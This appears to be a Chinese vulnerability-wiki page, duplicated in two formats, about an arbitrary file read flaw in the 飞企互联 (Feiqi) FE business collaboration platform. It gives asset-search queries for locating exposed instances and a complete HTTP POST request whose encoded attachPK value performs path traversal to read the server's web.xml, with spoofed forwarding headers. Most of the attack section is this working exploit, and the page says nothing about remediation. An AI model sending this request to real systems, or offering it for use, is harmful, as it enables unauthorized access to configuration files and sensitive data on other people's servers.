fofamini-wiki

登录白背景

源码

飞企互联 FE 业务协作平台attachment存在任意文件读取漏洞

一、漏洞简介

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

POST /servlet/webchat/attachment/1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Content-Length: 164
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

mailAttachment=1&attachPK=%2Fv8AMQAJAC8ACQAvAAkALwAJAC8ALg
AuAC8ALgAuAC8ALgAuAC8AagBiAG8AcwBzAC8AdwBlAGIALwBmAGUAL
gB3AGEAcgAvAFcARQBCAC0ASQBOAEYALwB3AGUAYgAuAHgAbQBs

原文: https://www.yuque.com/xiaokp7/ocvun2/ro7z20wk8r89iycd

# 飞企互联 FE 业务协作平台attachment存在任意文件读取漏洞

# 一、漏洞简介
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联 FE 业务协作平台存在文件读取漏洞，攻击者可通过该漏洞读取系统重要文件获取大量敏感信息。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/ngML-eRtplVZP0pQ/1699089816407-bde9e92a-e1f9-4241-bfde-6f8d413f338e-207313.png)

# 四、漏洞复现
```
POST /servlet/webchat/attachment/1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)
Gecko/20100101 Firefox/109.0
Content-Length: 164
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

mailAttachment=1&attachPK=%2Fv8AMQAJAC8ACQAvAAkALwAJAC8ALg
AuAC8ALgAuAC8ALgAuAC8AagBiAG8AcwBzAC8AdwBlAGIALwBmAGUAL
gB3AGEAcgAvAFcARQBCAC0ASQBOAEYALwB3AGUAYgAuAHgAbQBs
```
![image.png](./img/ngML-eRtplVZP0pQ/1699089844841-2b3f6b1b-8fae-438a-86bc-1fd31e7a791e-234606.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ro7z20wk8r89iycd>